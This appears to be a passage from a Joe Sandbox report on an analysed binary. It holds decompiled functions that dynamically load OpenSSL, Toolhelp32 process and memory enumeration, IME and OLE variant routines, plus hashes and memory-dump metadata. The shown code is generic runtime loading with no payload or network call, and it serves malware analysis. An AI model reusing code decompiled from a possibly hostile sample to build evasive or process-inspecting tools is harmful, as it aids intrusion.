                                                                                                                                                                                                                            					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
                                                                                                                                                                                                                            					 *0x49d590 = E00490648("RAND_screen", _t158);
                                                                                                                                                                                                                            					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
                                                                                                                                                                                                                            					 *0x49d550 = E00490648("des_set_key", _t158);
                                                                                                                                                                                                                            					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
                                                                                                                                                                                                                            					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
                                                                                                                                                                                                                            					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
                                                                                                                                                                                                                            					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
                                                                                                                                                                                                                            					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
                                                                                                                                                                                                                            					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
                                                                                                                                                                                                                            					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
                                                                                                                                                                                                                            					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
                                                                                                                                                                                                                            					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
                                                                                                                                                                                                                            					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
                                                                                                                                                                                                                            					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
                                                                                                                                                                                                                            					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
                                                                                                                                                                                                                            					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
                                                                                                                                                                                                                            						_t158 = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t158 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t158;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                                                                                                                                                                                              • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                                                                                                                                                                                              • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                            • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 2574300362-3914122982
                                                                                                                                                                                                                            • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                                                                                                                                                                                            • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004728A4() {
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49ebf4 == 0) {
                                                                                                                                                                                                                            					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            					if( *0x49ebf4 != 0) {
                                                                                                                                                                                                                            						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
                                                                                                                                                                                                                            						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
                                                                                                                                                                                                                            						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
                                                                                                                                                                                                                            						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
                                                                                                                                                                                                                            						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
                                                                                                                                                                                                                            						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
                                                                                                                                                                                                                            						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
                                                                                                                                                                                                                            						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
                                                                                                                                                                                                                            						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
                                                                                                                                                                                                                            						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
                                                                                                                                                                                                                            						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
                                                                                                                                                                                                                            						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
                                                                                                                                                                                                                            						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
                                                                                                                                                                                                                            						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
                                                                                                                                                                                                                            						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
                                                                                                                                                                                                                            						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                                                                                                            • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                                                                                                                                                                                            • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E00445F34() {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t11;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t13;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t17;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t19;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t21;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t25;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t27;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t29;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr _t44;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t42 = _t44;
                                                                                                                                                                                                                            				_t4 =  *0x49de44; // 0x49e744
                                                                                                                                                                                                                            				if( *((char*)(_t4 + 0xc)) == 0) {
                                                                                                                                                                                                                            					return _t4;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v8 = SetErrorMode(0x8000);
                                                                                                                                                                                                                            					_push(_t42);
                                                                                                                                                                                                                            					_push(0x44609a);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t44;
                                                                                                                                                                                                                            					if( *0x49eb6c == 0) {
                                                                                                                                                                                                                            						 *0x49eb6c = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *0x49bd4c == 0) {
                                                                                                                                                                                                                            						 *0x49bd4c = LoadLibraryA("imm32.dll");
                                                                                                                                                                                                                            						if( *0x49bd4c != 0) {
                                                                                                                                                                                                                            							_t11 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb70 = GetProcAddress(_t11, "ImmGetContext");
                                                                                                                                                                                                                            							_t13 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb74 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                                                                                                                                                                            							_t15 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb78 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                                                                                                                                                                            							_t17 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb7c = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                                                                                                                                                                            							_t19 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb80 = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                                                                                                                                                                            							_t21 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb84 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                                                                                                                                                                            							_t23 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb88 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                                                                                                                                                                            							_t25 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb8c = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                                                                                                                                                                            							_t27 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb90 = GetProcAddress(_t27, "ImmIsIME");
                                                                                                                                                                                                                            							_t29 =  *0x49bd4c; // 0x0
                                                                                                                                                                                                                            							 *0x49eb94 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t40);
                                                                                                                                                                                                                            					 *[fs:eax] = _t40;
                                                                                                                                                                                                                            					_push(0x4460a1);
                                                                                                                                                                                                                            					return SetErrorMode(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                                                                                                            • String ID: DI$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                                                                                                            • API String ID: 3397921170-1483999256
                                                                                                                                                                                                                            • Opcode ID: d828e86c6b6542eee2b05fbf6c56a19a2c2494676502a401f37b59ea03610f91
                                                                                                                                                                                                                            • Instruction ID: ef3ad77a40a7235546353be2f7b1bc646a7dfd85628d1f60096bddc463f7a869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d828e86c6b6542eee2b05fbf6c56a19a2c2494676502a401f37b59ea03610f91
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7315470948340AFE700EBB6FD56B1A37A9E325704B11863BB5019BAD3D77D68009F5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040F7D0() {
                                                                                                                                                                                                                            				struct HINSTANCE__* _v8;
                                                                                                                                                                                                                            				intOrPtr _t46;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                                                                                                                                                                            				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", E0040F340, _t91);
                                                                                                                                                                                                                            				 *0x49e7a8 = E0040F7A4("VarNeg", E0040F370, _t91);
                                                                                                                                                                                                                            				 *0x49e7ac = E0040F7A4("VarNot", E0040F370, _t91);
                                                                                                                                                                                                                            				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
                                                                                                                                                                                                                            				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
                                                                                                                                                                                                                            				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
                                                                                                                                                                                                                            				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
                                                                                                                                                                                                                            				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
                                                                                                                                                                                                                            				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
                                                                                                                                                                                                                            				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
                                                                                                                                                                                                                            				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
                                                                                                                                                                                                                            				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
                                                                                                                                                                                                                            				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
                                                                                                                                                                                                                            				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
                                                                                                                                                                                                                            				 *0x49e7f8 = _t46;
                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                                                                                                                                                                                              • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                            • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                                                            • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                            			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				struct HDC__* _v20;
                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                            				long _v32;
                                                                                                                                                                                                                            				long _v36;
                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                            				intOrPtr* _t78;
                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                            				struct HDC__* _t88;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				struct HDC__* _t92;
                                                                                                                                                                                                                            				struct HDC__* _t135;
                                                                                                                                                                                                                            				int _t162;
                                                                                                                                                                                                                            				intOrPtr _t169;
                                                                                                                                                                                                                            				intOrPtr _t171;
                                                                                                                                                                                                                            				struct HDC__* _t173;
                                                                                                                                                                                                                            				int _t175;
                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                            				void* _t178;
                                                                                                                                                                                                                            				intOrPtr _t179;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t177 = _t178;
                                                                                                                                                                                                                            				_t179 = _t178 + 0xffffffdc;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t173 = __eax;
                                                                                                                                                                                                                            				_t175 = _a16;
                                                                                                                                                                                                                            				_t162 = _a20;
                                                                                                                                                                                                                            				_v13 = 1;
                                                                                                                                                                                                                            				_t78 =  *0x49de34; // 0x49b0ec
                                                                                                                                                                                                                            				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                                                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L004072E0();
                                                                                                                                                                                                                            					_v20 = E00426060(0);
                                                                                                                                                                                                                            					_push(_t177);
                                                                                                                                                                                                                            					_push(0x426484);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t179;
                                                                                                                                                                                                                            					_push(_t175);
                                                                                                                                                                                                                            					_push(_t162);
                                                                                                                                                                                                                            					_push(_a32);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v24 = E00426060(_a32);
                                                                                                                                                                                                                            					_v28 = SelectObject(_v20, _v24);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t87 =  *0x49e894; // 0x5e080725
                                                                                                                                                                                                                            					_push(_t87);
                                                                                                                                                                                                                            					_t88 = _a32;
                                                                                                                                                                                                                            					_push(_t88);
